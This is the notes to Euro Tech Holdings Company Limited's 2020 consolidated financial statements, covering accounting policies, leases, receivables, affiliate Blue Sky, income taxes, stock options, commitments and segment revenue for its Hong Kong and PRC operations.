Cash and cash equivalents

Cash and cash equivalents consist of cash on hand, and bank deposits with original maturities of three months or less, all of which are unrestricted as to withdrawal. There were no cash equivalents as of December 31, 2020 and 2019.

(j)
Restricted cash

Restricted cash represents cash deposits retained with banks in the PRC for issuance of performance guarantees to the customers and cash deposited by the Group into separate accounts and designated as collateral for standby letters of credit in the same amount in accordance with contractual agreements.

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

EURO TECH HOLDINGS COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

2
Summary of significant accounting policies (Cont’d)

(l)
Classification of contract assets and liabilities

For revenue recognized associated with its contracts with customers over time, for which the Group has an enforceable right to receive compensation. Many of our contracts contain specific provisions that determine when the Group can bill for its work performed under these contracts.

Any revenue earned on a contract that has not yet been billed to the customer is recorded as a contract asset on the Group’s consolidated balance sheets.

The Group’s consolidated balance sheets present contract liabilities that contain deferred revenue that represent any costs incurred on contracts in process for which revenue has not yet been recognized.

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

(p)
Leases arrangements

In the ordinary course of business, the Group enters into a variety of operating lease arrangements.

Operating right-of-use leases are included in operating lease right-of-use assets, current portion of long-term operating lease obligations and long-term operating lease obligations, net of current maturities on the Group’s consolidated balance sheets, as appropriate. Operating lease right-of-use assets and operating lease liabilities are recognized based on the present value of the future minimum lease payments over the lease term at commencement date. As most of the Group’s leases do not provide an implicit rate to calculate present value, the Group determines this rate by estimating the Group’s incremental borrowing rate, utilizing the borrowing rates associated with the Group’s various debt instruments. The operating lease right-of-use asset also includes any lease payments made and initial direct costs incurred and excludes lease incentives. Our lease terms may include options to extend or terminate the lease when it is reasonably certain that we will exercise that option.

Lease expense for minimum lease payments is recognized on a straight-line basis over the lease term.

(q)
Goodwill

Goodwill is not amortized. The Group performs either a qualitative or quantitative assessment to review goodwill for impairment on an annual basis. This assessment is performed at the beginning of the fourth quarter, or when circumstances change, such as a significant adverse change in the business climate or the decision to sell a business, both of which would indicate that impairment may have occurred.

A qualitative assessment considers financial, industry, segment and macroeconomic factors, if the qualitative assessment indicates a potential for impairment, a quantitative assessment is performed to determine if impairment exists. The quantitative assessment begins with a comparison of the fair value of the reporting unit with its carrying value. If the carrying amount of the reporting unit exceeds its fair value, an impairment loss would be recognized in an amount equal to that excess, limited to the total amount of the goodwill allocated to the reporting unit. If the carrying value of goodwill exceeds its implied fair value, an impairment charge would be recorded in the consolidated statement of operations and comprehensive income / (loss).

As a result of the annual qualitative review process in 2020 and 2019, the Group determined it was not necessary to perform a quantitative assessment.

EURO TECH HOLDINGS COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

2
Summary of significant accounting policies (Cont’d)

(r)
Foreign currency translation

The assets and liabilities of the Group’s subsidiaries denominated in currencies other than U.S. dollars are translated into U.S. dollars using the applicable exchange rates at the consolidated balance sheet date. For consolidated statements of operations and comprehensive income/(loss)’ items, amounts denominated in currencies other than U.S. dollars were translated into U.S. dollars using the average exchange rate during the period. Equity accounts were translated at their historical exchange rates. Net gains and losses resulting from translation of foreign currency on consolidated financial statements are included in the consolidated statements of stockholders’ equity as accumulated other comprehensive income. Foreign currency transaction gains and losses are reflected in the consolidated statements of operations and comprehensive income/(loss).

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

(w)
Use of estimates

The preparation of the accompanying consolidated financial statements in conformity with GAAP requires management to make estimates and judgments that affect the reported amounts of assets and liabilities, the disclosure of contingent assets and liabilities at the date of the consolidated financial statements and the reported amounts of revenues and expenses during the reporting period. Certain accounting estimates of the Group require a higher degree of judgment than others in their application. These include the recognition of revenue and earnings from engineering contracts over time, the valuation of goodwill, and contract assets and contract liabilities. Management continually evaluates all of its estimates and judgments based on available information and experience; however, actual results could differ from these estimates.

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

The Group is subject to a concentration of risk because it derives a significant portion of its revenues from a few customers. The Group’s top customers accounting for more than 5% of the Group’s revenue generated approximately 23%, 34%, and 22% of consolidated revenues for the years ended December 31, 2020, 2019 and 2018, respectively. For the years ended December 31, 2020, 2019 and 2018, two customers (Customer A: 9%; Customer B: 8%), two customers (Customer A: 19%; Customer B: 10%) and one customer (Customer A: 15%) accounted for more than 10.0% of annual revenues, respectively.

The Group grants trade credit under contractual payment terms, generally without collateral, to its customers, which include high credit quality electric utilities, general contractors, owners and managers of industrial properties and government departments.

Consequently, the Group is subject to potential credit risk related to changes in business and economic factors. At December 31, 2020, three (2019: one) of the Group’s customers individually exceeded 10.0% of accounts receivable, net. The Group believes the terms and conditions in its contracts, billing and collection policies are adequate to minimize the potential credit risk.

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

(ae)
Fair value measurements

The Group uses the three-tier hierarchy of fair value measurement, which prioritizes the inputs used in measuring fair value based upon their degree of availability in external active markets. These tiers include: Level 1 (the highest priority), defined as observable inputs, such as quoted prices in active markets; Level 2, defined as inputs other than quoted prices in active markets that are either directly or indirectly observable; and Level 3 (the lowest priority), defined as unobservable inputs in which little or no market data exists, therefore requiring an entity to develop its own assumptions.

As of December 31, 2020 and 2019, the Group determined that the carrying values of cash and cash equivalents, restricted cash, accounts receivable, net, prepayments and other current assets, contract assets, bank borrowings, accounts payable, contract liabilities, other payables and accrued expenses and income tax payable approximate their fair values because of the short-term nature of these instruments.

EURO TECH HOLDINGS COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

2
Summary of significant accounting policies (Cont’d)

(af)
Recent accounting pronouncements

Changes to GAAP are typically established by the Financial Accounting Standards Board (“FASB”) in the form of accounting standards updates (“ASUs”) to the FASB’s ASC. The Group considers the applicability and impact of all ASUs. The Group, based on its assessment, determined that any recently issued or proposed ASUs not listed below are either not applicable to the Group or may have minimal impact on its consolidated financial statements.

Recently adopted accounting pronouncements

In June 2016, the FASB issued ASU 2016-13, Financial Instruments-Credit Losses (Topic 326), Measurement of Credit Losses on Financial Instruments, which introduced an expected credit loss methodology for the measurement and recognition of credit losses on most financial instruments, including trade receivables and off-balance sheet credit exposures. Under this guidance, an entity is required to consider a broader range of information to estimate expected credit losses, which may result in earlier recognition of losses. This ASU also requires disclosure of information regarding how a company developed its allowance, including changes in the factors that influenced management’s estimate of expected credit losses and the reasons for those changes.

In January 2017, the FASB issued ASU 2017-04, Intangibles-Goodwill and Other (Topic 350): Simplifying the Test for Goodwill Impairment, which simplifies the subsequent measurement of goodwill, through the elimination of Step 2 from the goodwill impairment test. Instead, an entity should perform its annual, or interim, goodwill impairment test by comparing the fair value of a reporting unit with its carrying amount. The Group adopted this ASU on a prospective basis in January 2020 and there was no effect on the Group’s consolidated financial statements.

In August 2018, the FASB issued ASU 2018-13, Fair Value Measurement (Topic 820): Disclosure Framework-Changes to the Disclosure Requirements for Fair Value Measurement, which modifies the disclosure requirements for Level 1, Level 2 and Level 3 instruments in the fair value hierarchy. The Group adopted this ASU in January 2020 and there was no effect on the consolidated financial statements or disclosures.

Recently issued accounting pronouncements not yet adopted

In December 2019, the FASB issued ASU 2019-12, Simplifying the Accounting for Income Taxes, which simplifies the accounting for income taxes, eliminates certain exceptions within ASC 740, Income Taxes, and clarifies certain aspects of the current guidance to promote consistent application among reporting entities. The guidance is effective for fiscal years beginning after December 15, 2020, and interim periods within those fiscal years, with early adoption permitted. Upon adoption, the Group must apply certain aspects of this standard retrospectively for all periods presented while other aspects are applied on a modified retrospective basis through a cumulative-effect adjustment to retained earnings as of the beginning of the fiscal year of adoption. The adoption of this standard is not expected to have a material impact on the Group’s consolidated financial statements or disclosures.

EURO TECH HOLDINGS COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

2
Summary of significant accounting policies (Cont’d)

(af)
Recent accounting pronouncements (Cont'd)

In January 2020, the FASB issued ASU 2020-01, “Investments-Equity Securities (Topic 321), Investments-Equity Method and Joint Ventures (Topic 323), and Derivatives and Hedging (Topic 815),” an amendment clarifying the interaction between accounting standards related to equity securities, equity method investments, and certain derivative instruments. The guidance is effective for fiscal years beginning after December 15, 2020. ASU 2020-01 will become effective for the Group in fiscal 2022. The Group is currently evaluating the impact of the new guidance on its consolidated financial statements.

In October 2020, the FASB issued ASU 2020-10, “Codification Improvements,” this ASU affects a wide variety of Topics in the Codification. They apply to all reporting entities within the scope of the affected accounting guidance. More specifically, this ASU, among other things, contains amendments that improve the consistency of the Codification by including all disclosure guidance in the appropriate Disclosure Section (Section 50). Many of the amendments arose because the FASB provided an option to give certain information either on the face of the financial statements or in the notes to financial statements and that option only was included in the Other Presentation Matters Section (Section 45) of the Codification. The option to disclose information in the notes to financial statements should have been codified in the Disclosure Section as well as the Other Presentation Matters Section (or other Section of the Codification in which the option to disclose in the notes to financial statements appears). Those amendments are not expected to change current practice. The amendments are effective for annual periods beginning after December 15, 2021, and interim periods within annual periods beginning after December 15, 2022. Early application of the amendments is permitted for and varies based on the entity. The amendments should be applied retrospectively and at the beginning of the period that includes the adoption date. The Group is currently evaluating the impact of the new guidance on its consolidated financial statements.

(ag)
Reclassification

Certain reclassifications have been made to prior year amounts to conform with the current year presentation.

(ah)
Non-controlling interests

For entities that are consolidated, but not 100% owned, a portion of the income or loss and equity is allocated to owners other than the Group. The aggregate of the income or loss and corresponding equity that is not owned by the Group is included within non-controlling interests in the consolidated financial statements.

Non-controlling interests is presented as a separate component of equity in the consolidated balance sheets. Net income includes the net income attributable to the holders of non-controlling interests in the consolidated statements of operations and comprehensive income / (loss). Profits and losses are allocated to non-controlling interests in proportion to their relative ownership interests regardless of their basis.

(ai)
Impairment of long lived assets

Long-lived assets such as property, plant and equipment with finite lives are evaluated for impairment whenever events or changes in circumstances indicate that the carrying value of an asset may not be fully recoverable or that the useful life is shorter than the Group had originally estimated. When these events occur, the Group evaluates the impairment for the long-lived assets by comparing the carrying value of the assets to an estimate of future undiscounted cash flows expected to be generated from the use of the assets and their eventual disposition. If the sum of the expected future undiscounted cash flows is less than the carrying value of the assets, the Group recognizes an impairment loss based on the excess of the carrying value of the assets over the fair value of the assets.

3
Lease obligations

The Group has operating leases primarily for office space. The Group’s leases have remaining lease terms of several months to two years.

The components of lease expense are as follows:

	Years ended December 31,
	2020	2019
	US$’000	US$’000

Operating lease cost	257	193
Short-term lease cost	64	153

Total lease cost	321	346

EURO TECH HOLDINGS COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

3
Lease obligations

Supplemental consolidated cash flow information related to leases is as follows:

	Years ended December 31,
	2020	2019
	US$’000	US$’000

Cash paid for amounts included in the measurement of lease liabilities:

Operating cash flows from operating leases	195	346

Right-of-use assets obtained in exchange for lease obligations (noncash):
Operating leases	-	460

Supplemental consolidated balance sheet information related to leases is as follows:

	December 31,
	2020	2019
	US$’000	US$’000

Operating leases
Operating lease right-of-use assets	233	406

Current portion of long-term operating lease obligations	118	170
Long-term operating lease obligations, net of current maturities	94	216

Total operating lease liabilities	212	386

Weighted average remaining lease term
Operating leases	16 months	27 months

Weighted average discount rate
Operating leases	5%	5%

Maturities of lease liabilities are as follows:

Operating leases
US$’000

Year ending December 31,
2021	144
2022	102

Total lease payments	246
Less: imputed interest	(34)
Total	212

EURO TECH HOLDINGS COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

4
Accounts receivable, net

Accounts receivable, net consisted of the following at December 31:

	2020	2019
	US$’000	US$’000

Contract receivables	3,229	3,622
Less: allowance for doubtful accounts	(30)	(36)

	3,199	3,586

The roll-forward of activity in the allowance for doubtful accounts was as follows for the years ended December 31:

	2020	2019
	US$’000	US$’000

Balance at beginning of period	36	112
Less : reversal in allowances	(6)	(76)

Balance at end of period	30	36

The following is an aging analysis of accounts receivable, net at December 31:

	2020	2019
	US$’000	US$’000

Current	2,014	1,495

Past due
1-30 days	85	41
31-60 days	202	1,343
61-90 days	41	99
Greater than or equal to 91 days	857	608

	1,185	2,091

	3,199	3,586

EURO TECH HOLDINGS COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

5
Prepayments and other current assets

Prepayment and other current assets mainly represent deposits paid for purchases and services, rental and utilities deposits, and prepaid expenses.

	December 31,
	2020	2019
	US$’000	US$’000

Deposits paid	838	344
Prepayments	168	151
Other receivables	250	251
Other tax recoverable	258	2

	1,514	748

6
Contract assets and liabilities

Contracts with customers usually stipulate the timing of payment, which is defined by the terms found within the various contracts under which work was performed during the period. Therefore, contract assets and liabilities are created when the timing of costs incurred on work performed does not coincide with the billing terms.

The Group’s consolidated balance sheets present contract assets which contains earned unbilled revenue associated with contract work that has been completed but not paid by customers, that are generally due once the job is completed and approved.

Contract assets consisted of the following at December 31:

	2020	2019
	US$’000	US$’000

Unbilled revenue	202	441

The Group’s consolidated balance sheets present contract liabilities which contains deferred revenue (previously identified as billings in excess of costs and estimated earnings on uncompleted contracts).

EURO TECH HOLDINGS COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

6
Contract assets and liabilities (Cont’d)

Contract liabilities consisted of the following at December 31:

	2020	2019
	US$’000	US$’000

Deferred revenue	1,063	869

The following table provides information about contract assets and contract liabilities from contracts with customers:

	December 31,
	2020	2019
	US$’000	US$’000

Contract assets	202	441
Contract liabilities	(1,063)	(869)

Net contract liabilities	(861)	(428)

The difference between the opening and closing balances of the Group’s contract assets and contract liabilities primarily results from the timing of the Group’s billings in relation to its performance of work. The amounts of revenue recognized in the period that were included in the opening contract liability balances were US$1,214,000 and US$1,225,000 for the years ended December 31, 2020 and 2019, respectively. The revenue consists primarily of work performed on previous billings to customers.

The net liabilities position for contracts in process consisted of the following at December 31:

	2020	2019
	US$’000	US$’000

Cost and estimated earnings on uncompleted contracts	1,904	5,150
Less: billings to date	(2,765)	(5,578)

	(861)	(428)

EURO TECH HOLDINGS COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

6
Contract assets and liabilities (Cont’d)

The net liabilities position for contracts in process is included within the contract asset and contract liability in the accompanying consolidated balance sheets as follows at December 31:

	2020	2019
	US$’000	US$’000

Unbilled revenue	202	441
Deferred revenue	(1,063)	(869)

	(861)	(428)

7
Inventories
	December 31,
	2020	2019
	US$’000	US$’000

Raw materials	63	85
Work in progress	20	29
Finished goods	259	472

	342	586

Management continuously reviews obsolete and slow moving inventories and assesses the inventory valuation to determine if the write-down of inventories is deemed appropriate. For the years ended December 31, 2020, and 2019, write-down of inventories amounted to US$13,000 and US$35,000, respectively, which were charged to cost of revenue in consolidated statements of operations and comprehensive income / (loss).

EURO TECH HOLDINGS COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

8
Property, plant and equipment, net

	December 31,
	2020	2019
	US$’000	US$’000

Office premises*	673	1,866
Leasehold improvements	157	155
Furniture, fixtures and office equipment	557	511
Motor vehicles	175	173
Testing equipment	37	37

	1,599	2,742

Less: Accumulated depreciation	(1,340)	(2,042)

	259	700

	Year ended December 31,
	2020	2019	2018
	US$’000	US$’000	US$’000

Depreciation charge	49	69	60

* Far East earns rental income from a property in Beijing, PRC for which it does not hold the title. Far East is investigating various ways in which to obtain the title but has not formulated a specific plan as of the date of issuance of this consolidated financial statements. The net book value of the property at December 31, 2020 is approximately US$92,000 (2019: US$96,000).

9
Investments in affiliates

Investments in affiliates are accounted for using the equity method of accounting.

Far East is holding 19.4% (2019: 19.4%) equity interests in Blue Sky, a company incorporated in the PRC, with total cost of investment of US$5,540,000. Blue Sky provides a comprehensive service for design, general contract, equipment manufacturing, installation, testing and operation management of the treatment of waste gases emitted from various boilers and industrial furnaces of power plants, steel works and chemical plants since 2000.

Blue Sky has listed its shares on the New Third Board in the PRC since November 17, 2015 and suspended trading from August 15, 2017 and resumed trading on February 2, 2018 and suspended trading from November 24, 2020 and resumed trading on January 6, 2021.

The Group’s interest in Blue Sky has been counted for as an affiliate using the equity method as the Group has representation on both the Board and Executive Committee of Blue Sky, and the ability to participate in the decision-making process and exercise significant influence.

EURO TECH HOLDINGS COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

9
Investments in affiliates (Cont’d)

A summary of the financial information of the affiliate, Blue Sky, is set forth below:

	December 31,
	2020	2019
Balance Sheet:	US$’000	US$’000

Current assets	44,918	41,614

Non-current assets	15,258	15,666

Total assets	60,176	57,280

Total liabilities	(30,889)	(31,108)

Total shareholders’ equity	29,287	26,172

	Year ended December 31,
	2020	2019
Operating results:	US$’000	US$’000

Net sales	43,933	40,348

Operating income	2,214	677

Net income	1,946	704

Far East previously held 20% equity interests in Zhejiang Jia Huan Electronic Co. Ltd. (“Jia Huan”), a company incorporated in the PRC, with total cost of investment of US$2,486,000. Jia Huan provides a comprehensive service for environmental protection business since 1969 and is based in Jin Hua, Zhejiang. On March 5, 2018, Far East entered into an Equity Transfer Agreement to sell this 20% equity stake of Jia Huan for a purchase price of RMB31,312,500 to Ms. Jin Lijuan, the wife of the holder of the remaining 80% equity stake of Jia Huan. In accordance with the terms of the Agreement, all approvals and registrations with the relevant governmental authorities were obtained, the closing of the transaction has been completed, and the Purchaser paid the Purchase Price to the Company, in full in May 2018. The Company made gain of US$1,522,000 on this disposal.

EURO TECH HOLDINGS COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

10
Other payables and accrued expenses

Other payables and accrued expenses mainly represent deposits received from customers and accruals for operating expenses.

	December 31,
	2020	2019
	US$’000	US$’000

Dividend payables	84	80
Deposits received from customers	-	31
Rental deposit received	4	12
Accruals for operating expenses	1,500	941
Other tax payables	5	78

	1,593	1,142

11
Ordinary share

During the years ended December 31, 2018 and 2020, there was no movement with the Company’s issued ordinary shares and outstanding shares.

On October 8, 2019, the Company issued bonus shares at the rate of one ordinary share for every two ordinary shares held, creating 1,030,950 new shares of common stock.

Number of outstanding shares at year end of:

	2020	2019

Shares issued	3,260,559	3,260,559
Less: shares under treasury stock	(167,700)	(167,700)

	3,092,859	3,092,859

12
Goodwill

Reporting units - The Group’s reporting units consist of its trading and manufacturing and engineering segments. Goodwill is not amortized, but instead is reviewed for impairment at least annually during the fourth quarter of each year at the reporting level, absent any interim indicators of impairment or other factors requiring an assessment.

Annual impairment assessment - For our 2020 annual impairment test we performed a qualitative assessment, using information as of October 1. Under current guidance, we are permitted to first assess qualitative factors to determine whether it is more likely than not that the fair value of a reporting unit is less than its carrying amount as a basis for determining whether it is necessary to perform a quantitative goodwill impairment test. We determined there were no factors indicating the need to perform a quantitative goodwill impairment test and concluded that it is more likely than not the fair value of our reporting units is greater than their carrying value and thus there was no impairment to goodwill.

EURO TECH HOLDINGS COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

12
Goodwill (Cont'd)

In addition to our annual review, we assess the impairment of goodwill whenever events or changes in circumstances indicate that the carrying value of a reporting unit may be greater than fair value. Factors that could trigger an interim impairment review include, but are not limited to, significant adverse changes in the business climate which may be indicated by a decline in our market capitalization or decline in operating results. No impairments were recorded to our goodwill during the years ended December 31, 2020, 2019 and 2018. No material events or changes occurred between the testing date and year end to trigger a subsequent impairment review.

At December 31, 2020 and 2019, we had goodwill for our engineering segment with a carrying amount of US$1,071,000 and US$1,071,000, respectively.

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

Under the PRC laws and regulations, the PRC subsidiaries are restricted in their ability to transfer certain of its net assets in the form of dividend payments, loans or advances. The amounts restricted include paid-in capital and statutory reserves, as determined pursuant to PRC generally accepted accounting principles, totaling US$3,174,000 as at December 31, 2020 (2019: US$3,174,000 and 2018: US$3,174,000).

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

EURO TECH HOLDINGS COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

14
Other income / (losses), net

	Year ended December 31,
	2020	2019	2018
	US$’000	US$’000	US$’000

Exchange gain / (loss), net	101	(30)	7
Rental income	59	82	51
Government subsidies – Employment Support Scheme *	147	-	-

	307	52	58

* The amount represents salaries and wage subsidies granted under Anti-Epidemic Fund by the Government of the Hong Kong Special Administrative Region for the use of paying wages of employees from June to November 2020.

15
Income taxes

No income tax arose in the United States of America by the Group for the years ended December 31, 2020, 2019 and 2018.

The Company and Pact Asia Pacific Limited are exempt from taxation in the British Virgin Islands (“BVI”).

Far East and Euro Tech (China) Limited provided for Hong Kong profits tax at a rate of 8.25% on assessable profits up to US$256,000; and 16.5% on any part of assessable profits over US$256,000 in year 2020 (2019 and 2018: 16.5%) on the basis of their income for financial reporting purposes, adjusting for income and expense items which are not assessable or deductible for profits tax purposes.

Euro Tech Trading (Shanghai) Limited (“ETTS”), a subsidiary of Far East, provides for PRC Enterprise Income Tax (“EIT”) at a rate of 25% (2019 and 2018: 25%), after offsetting losses brought forward, if any, on the basis of its income for financial reporting purposes, adjusting for income and expense items which are not assessable or deductible for PRC Enterprise Income Tax purposes. As of December 31, 2020, ETTS had an assessable loss carried forward of US$604,778 as agreed by the local tax authority to offset its profit for the forth coming years (2019: US$518,328 and 2018: US$801,751). Such loss will expire in 5 years.

Shanghai Euro Tech Limited (“SET”), a subsidiary of Far East, provides for PRC Enterprise Income Tax at a rate of 25% (2019 and 2018: 25%), after offsetting losses brought forward, if any, on the basis of its income for financial reporting purposes, adjusting for income and expense items which are not assessable or deductible for PRC Enterprise Income Tax purposes. As of December 31, 2020, SET had an assessable loss carried forward of US$658,733 as agreed by the local tax authority to offset its profit for the forth coming years (2019: US$444,192 and 2018: US$317,098). Such loss will expire in 5 years.

EURO TECH HOLDINGS COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

15
Income taxes (Cont'd)

Shanghai Euro Tech Environmental Engineering Company Limited (“SETEE”), a subsidiary of Far East, provides for PRC Enterprise Income Tax at a rate of 25% (2019 and 2018: 25%), after offsetting losses brought forward, if any, on the basis of its income for financial reporting purposes, adjusting for income and expense items which are not assessable or deductible for PRC Enterprise Income Tax purposes. As of December 31, 2020, SETEE had an assessable loss carried forward of US$34,032 as agreed by the local tax authority to offset its profit for the forth coming years (2019: US$380,591 and 2018: US$854,388). Such loss will expire in 5 years.

Yixing Pact Environmental Technology Co. Ltd. (“Yixing”), a subsidiary of Far East, provides for PRC Enterprise Income Tax at a rate of 25% (2019 and 2018: 25%), after offsetting losses brought forward, if any, on the basis of its income for financial reporting purposes, adjusting for income and expense items which are not assessable or deductible for PRC Enterprise Income Tax purposes. As of December 31, 2020, Yixing had an assessable loss carried forward of US$2,304,828 as agreed by the local tax authority to offset its profit for the forth coming years (2019: US$1,664,275 and 2018: US$1,228,223). Such loss will expire in 5 years.

Under the New Enterprise Income Tax Law and the implementation rules, profits of the PRC subsidiaries earned on or after January 1, 2008 and distributed by the PRC subsidiaries to foreign holding company are subject to a withholding tax at a rate of 10% unless reduced by tax treaty. Aggregate undistributed earnings of Far East’s subsidiaries located in the PRC that are available for distribution to Far East of approximately US$0.6 million at December 31, 2020 (2019: US$0.6 million and 2018: US$0.6 million) are intended to be reinvested, and accordingly, no deferred taxation has been made for the PRC dividend withholding taxes that would be payable upon the distribution of those amounts to Far East. Distributions made out of pre January 1, 2008 retained earnings will not be subject to the withholding tax.

The Company and its subsidiaries are based in Hong Kong and PRC and file Hong Kong profits tax return and PRC EIT return, respectively. The components of the (provision) / credit for income taxes (expense ) / credit were as follows:

	Year ended December 31,
	2020	2019	2018
	US$’000	US$’000	US$’000
Current taxes (expense) / credit
Hong Kong profits tax and the PRC EIT	(4)	-	346

Income tax (expense) / credit	(4)	-	346

Deferred tax expenses
Hong Kong and the PRC	(92)	(37)	(34)

Total deferred tax expense	(92)	(37)	(34)

Total (expense) / credit	(96)	(37)	312

EURO TECH HOLDINGS COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

15
Income taxes (Cont’d)

The items comprising the difference between income taxes computed at the Hong Kong profits tax and PRC EIT statutory tax rates in effect for 2020, 2019 and 2018 and our effective tax rates were as follows:

	Year ended December 31,
	2020	2019	2018
	US$’000	US$’000	US$’000

Income / (loss) before income taxes	498	173	(373)

Computed tax using respective companies’ statutory tax rates	133	69	254
Change in valuation allowances	48	30	68
Under / (over-provision) for income taxes in prior years	-	(5)	131
Non-deductible expenses	(277)	(131)	(5)

Income taxes (expense) / credit at effective tax rate	(96)	(37)	312

The components of deferred tax (liabilities) / assets are as follows:
	December 31,
	2020	2019
	US$’000	US$’000

Tax losses	901	858
Temporary differences	(5)	(19)
Less: Valuation allowances	(901)	(752)

Net deferred tax (liabilities) / assets	(5)	87

Uncertain tax positions

As a result of the Group’s analysis, management has determined that the Group does not have any material uncertain tax positions.

16
Net income per ordinary share

The calculation of the basic and diluted net income per ordinary share is based on the following data:

	December 31,
	2020	2019	2018
	Number of shares

Weighted average number of ordinary shares for the purposes of basic and diluted net income per share	3,092,859	2,301,993	2,061,909

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

The Company estimate the fair value of the options granted under the Binomial pricing model at US$2.324 per share.

Changes in outstanding options under various plans mentioned above were as follows:

	Year ended December 31,
	2020		2019		2018
	Number of options	Weighted average exercise price	Number of options	Weighted average exercise price	Number of options	Weighted average exercise price
		US$		US$		US$

Outstanding, beginning of year	51,000	2.60	-	-	-	-
Granted	-	-	51,000	2.60	-	-

Outstanding, end of year	51,000	2.60	51,000	2.60	-	-

Exercisable, end of year	-	-	-	-	-	-

EURO TECH HOLDINGS COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

17
Stock options (Cont’d)

As of December 31, 2020, 2019 and 2018, there was no unrecognized ; stock-based compensation expense related to unvested stock options. The compensation expense for the year is US$54,157 (2019: US$10,358; 2018: US$ Nil).

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

During the years ended December 31, 2020, 2019 and 2018, the aggregate contributions of the Group to the aforementioned pension plans and retirement benefit schemes were approximately US$104,000, US$332,000 and US$278,000 respectively.

As stipulated by the rules and regulations in the PRC, the PRC’s subsidiaries contributes to state-sponsored retirement plans for its employees in Mainland China. PRC’s subsidiaries’ contribution approximately 16% of the basic salaries of its employees, and have no further obligations for the actual payment of pension or post-retirement benefits beyond the annual contributions. The state-sponsored retirement plans are responsible for the entire pension obligations payable to retired employees.

EURO TECH HOLDINGS COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

19
Risk factors

Financial risk factors

The Group’s activities expose it to a variety of financial risks: credit risk and foreign exchange rate risk.

(i)
Credit risk

The Group has no significant concentration of credit risk, cash in banks in Hong Kong and PRC is insured with limit of approximately US$64,000 and US$72,000, respectively per bank per each depositor. Uninsured cash in banks and restricted cash balances in Hong Kong and PRC are of approximately US$4,594,000 (2019: US$6,468,000). Cash transactions are limited to high credit quality banks.

(ii)
Foreign exchange rate risk

The Group operates in Hong Kong, the PRC and trades with both local and overseas customers and suppliers, and is exposed to foreign exchange rate risk arising from various currency exposures, primarily with respect to purchases in Hong Kong dollars, Renminbi and Euros. Foreign exchange risk arises from committed and unmatched future commercial transactions, such as confirmed import purchase orders and sales orders, recognized assets and liabilities, and net investment in the PRC operations.

20
Related party transactions

Other than compensation to directors and stock options available to the directors and disposal of long-term investment to associate Blue Sky for a total consideration of approximately US$148,000 with nil gain or loss on disposal during the year ended December 31, 2020, there were no transactions with other related parties in the years 2020, 2019 and 2018.

21
Commitments and contingencies

(i)
Banking facilities

As at December 31, 2020 and 2019, the Group had various banking facilities available for overdraft and import and export credits from which the Group can draw up to approximately US$897,000 and US$897,000 respectively, of which approximately US$596,000 and US$778,000 were utilised for issuance of bank guarantees as security for the performance of various contracts with customers and import loans. The various banking facilities are secured by a bank deposit of approximately US$897,000 and various blanket counter indemnities and counter indemnities. The weighted average interest rate for import loans as at December 31, 2020 was 4.9% per annum (December 31, 2019: 4.9% per annum). For the years ended December 31, 2020 and 2019, the average dollar amount of the bank borrowings was approximately US$457,000 and US$92,000 respectively and average interest rates were approximately 4.9% and 4.9% per annum respectively for the years ended December 31, 2020 and 2019.

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

(iii)
Insurance

The Group carries insurance policies to cover various risks, primarily general liability, automobile liability, workers’ compensation and employee medical expenses under which we are liable to reimburse the insurance company for a portion of each claim paid.

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

(v)
Litigations

The Group is now and may in the future be involved as a party to various legal proceedings that are incidental to the ordinary course of business. Management, after consultation with legal counsel, does not believe that the outcome of these actions will have a material impact on the consolidated financial statements of the Group. There are no significant unresolved legal issues as of December 31, 2020 and 2019.

(vi)
Contingencies

The Group accounts for loss contingencies in accordance with ASC Topic 450 and other related guidelines. As of December 31, 2020 and 2019, the Group’s management is of the opinion that there are no commitments and contingencies to account for.

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

	Year ended December 31,
	2020	2019	2018
	US$’000	US$’000	US$’000
Revenue
Trading and manufacturing	9,476	11,877	13,770
Engineering	3,881	5,522	6,334

	13,357	17,399	20,104
Operating loss
Trading and manufacturing	(488)	(102)	(119)
Engineering	(1,027)	(158)	(821)
Unallocated corporate expenses	(186)	(180)	(119)

	(1,701)	(440)	(1,059)

	Year ended December 31,
	2020	2019	2018
	US$’000	US$’000	US$’000
Depreciation:
Trading and manufacturing	39	54	43
Engineering	10	15	17

	49	69	60

Capital expenditures, gross
Trading and manufacturing	2	17	79
Engineering	9	4	6

	11	21	85

	December 31,
	2020	2019
	US$’000	US$’000
Assets
Trading and manufacturing	7,877	9,843
Engineering	12,218	12,370

	20,095	22,213
Liabilities
Trading and manufacturing	2,645	4,319
Engineering	2,987	2,557

	5,632	6,876

EURO TECH HOLDINGS COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

22
Segment information (Cont’d)

(ii)
Geographical analysis of revenue by customer location is as follows:

	Year ended December 31,
	2020	2019	2018
	US$’000	US$’000	US$’000
Revenue -
The PRC	5,072	6,886	8,026
Hong Kong	8,024	10,169	11,169
Others	261	344	909

	13,357	17,399	20,104

(iii)
Long-lived assets (1)

Geographical analysis of long-lived assets is as follows:

	December 31,
	2020	2019
	US$’000	US$’000

Hong Kong	47	478
The PRC	212	222

	259	700
(1)
